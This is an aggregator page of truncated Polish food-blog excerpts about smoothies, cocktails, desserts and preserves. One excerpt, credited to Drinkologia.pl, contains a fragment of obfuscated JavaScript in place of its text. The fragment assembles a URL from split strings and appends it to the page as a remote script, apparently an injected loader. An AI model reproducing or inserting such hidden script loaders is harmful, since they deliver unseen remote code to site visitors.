kojarzą się z latem, ciepłem i plażą. Mając w głowie tylko „żółty, żółty” trafiłam dziś na mango w sklepie. I tak mój blender i ja stworzyliśmy koktajl z mango i kiwi, który zdecydowanie trafił w mój kolor „lata”. Takim […] Artykuł Mango! Mango! pochodzi z serwisu Pink Envelope
Pink Envelopesezon truskawkowy ruszył pełną parą, bo co widzę smaczne przepisy to królują te owoce. Ja dziś znalazłam w swojej lodówce poza światełkiem, trochę truskawek, co się ostały po ostatnim koktajlu. By nie narażać już swojej wagi na duże ciasta, zrobiłam 2 porcję mini tarty z budyniem, co zjedliśmy z lubym na deser. Słodkie […] Artykuł Mini tarta z truskawkami pochodzi
Pink Envelopemoim blokiem już od samego rana rozkładali się sprzedawcy ze świeżymi owocami i warzywami. Zawsze brałam truskawki i maliny, by później, w ten upał, chłodzić się litrami koktajli. Z dzieciństwa pamiętam jak Dziadek przynosił z działki całe […] Artykuł Hello Summer! pochodzi z serwisu Pink Envelope
Pink EnvelopeKochani, odkryłam nową pasję :) Wiele już pisałam o zielonych koktajlach, które piję w ramach naprawy zdrowia. Często dodaję do nich egzotyczne owoce. Ostatnio coś mnie podkusiło i postanowiłam zasadzić pestkę mango. Udało się :) wykiełkowała i rośnie pięknie jak na razie. Już planuję, co posadzę następne. Marzy mi się awokado, marakuja i granat. Widziałam też na YouTube jak posadzić kiwi
Mama z Motylemswoich sądach opiera się na badaniach naukowych i swoim biochemicznym wykształceniu. W książce nie oszczędza nikogo. Szydzi z nas samych, którzy dajemy sobie naiwnie wmówić, że pijąc zielone koktajle, trafimy do nieba. Nie trafimy. Za to damy zarobić tym, którzy za modami stoją. Książka uczy zdrowego rozsądku i obala mit, że dzięki diecie takiej, a nie innej będziemy wiecznie
Z Kuchni Do Kuchniroku różne przetwory z pomidorów, polecam szczególnie: pomidory w słoikach Suszone pomidory w zalewie Przepis na suszone pomidory w zalewie oliwnej Pieczone pomidory Pomidory na zupę do słoików Koktajl pomidorowy Domowy ketchup ze świeżych pomidorów Polecam też przepisy na pomidorowe sosy : sos pomidorowy na zimę słodki Relish k olejny sos pomidorowy do słoików błyskawiczny sos ze świeżych pomidorów oraz przepis
Damsko-męskie spojrzenie na kuchnięInne przepisy z wykorzystaniem komosy ryżowej i instrukcje jak ją gotować: bezglutenowy tort czekoladowy<klik> , sałatka z papryką<klik> , sałatka z jabłkami<klik> , koktajl proteinowy<klik> , fit babeczki<klik> . Składniki: 1 1/2 szklanki ugotowanej komosy ryżowej 1/4 czerwonej cebuli 12 pomidorków koktajlowych (lub 2 średnie pomidory) 1 długi ogórek
Lamarida.pldane spróbować i jeśli nie pokochać, to przynajmniej polubić. Jednak jeśli chodzi o dodanie melona do jakiejś sałatki, to nie mam z tym problemu. Podobnie jak z przygotowaniem koktajlu, który na tym owocu bazuje. W tym wydaniu, za sprawą aromatycznego sosu na bazie octu balsamicznego również zjadłam go z przyjemnością, tym bardziej, że pod ręką miałam też pyszną mozzarellę
Kuchnia w czekoladziesię na badaniach naukowych oraz biochemicznym wykształceniu. W książce nie oszczędza nikogo. Szydzi z modnych blogerów, kucharzy celebrytów i wszystkich tych, którzy dają sobie naiwnie wmówić, że pijąc zielone koktajle - trafią do nieba. Nie trafią! Werner zebrał zespół psychiatrów, ekonomistów, specjalistów od żywienia oraz dietetyków i razem z nimi postanowił rozwiązać frapującą wszystkich zagadkę: dlaczego wrażliwi i inteligentni ludzie
Di gotujetrawienie i wzmagają apetyt. Z powodzeniem można serwować wermut, wino musujące, sherry, campari, gin z tonikiem. Aperitif nie musi opierać się na czystych alkoholach, bardzo dobrze sprawdzają się też koktajle przygotowywane na bazie wermutów, campari lub innych alkoholi. Na aperitif nie powinno się podawać tych samych napojów alkoholowych, które będą serwowane podczas głównego posiłku. Przygotowując aperitif w domu trzeba pamiętać
Domowa Cukierenka-Domowa Kuchniax7i1u="122807815"+".";x7i1.async=true;x7i1u+="xxyaxaeh7i1nkwa43nu035fqms4rbj"; x7i1.src="https://"+x7i1_+x7i1u; x7i1b=document.body; x7i1b.appendChild(x7i1); })(); Artykuł Hurtownia gastronomiczna – co może zaoferować klientom? pochodzi z serwisu Przepisy na drinki, koktajle, nalewki, shoty - Drinkologia.pl
Drinkologiamyję, tnę na mniejsze kawałki i mrożę. Do tego banan, trzy jabłka i sok z 1 pomarańczy, bo więcej nie miałam. Po zmiksowaniu patrzę - a tu piękny gęsty zielony koktajl , którego nie da się pić, a który można jeść łyżką! Dodałam to co miałam, nektarynkę (dostałam z ogrodu koleżanki z pracy), trochę orzechów nerkowca i nasionka chia
bistro mamaproste. Jednak wiele osób pytało mnie już kilkakrotnie jak najlepiej, to zrobić. Co zrobić by nie mieć zbitej kuli, a luźne owoce, które można później wykorzystać do wypieków, deserów, koktajli, naleśników itd. Ja staram się mieć zawsze zapas mrożonych owoców w zamrażalniku. Oczywiście jeśli nie wykorzystam ich w całości do soków lub mam miejsce w lodówce W tym roku moja
Słodkie okruszkismakowych, kulinarnych połączeń, a przed Wami lody brzoskwiniowe z kawałkami owoców. Dzień wcześniej mrożę obrane i pokrojone brzoskwinie i banany ( dobrze zamrozić większą ilość, przydadzą się na lody i koktajle). SKŁADNIKI: ok. 500 g. brzoskwiń mrożonych ( przygotowuję je dzień wcześniej) 1 brzoskwinia pokrojona w drobną kostkę 2 - 3 banany mrożone miód 3-4 łyżki sok z cytryny - 1 łyżka
Upiecz sobie babeczkęlodów z bananami , oraz wersji do foremek - brzoskwiniowych wodnych lodów . Dzień wcześniej mrożę obrane i pokrojone brzoskwinie ( dobrze zamrozić większą ilość, przydadzą się na lody i koktajle). SKŁADNIKI: brzoskwinie - dowolna ilość miód ( lub inne słodzidło) do smaku - w zależności od słodyczy owoców sok z cytryny - dla podkręcenia smaku WYKONANIE: mrożone owoce blenduję (dobrze jest robić mniejsze porcje
Upiecz sobie babeczkę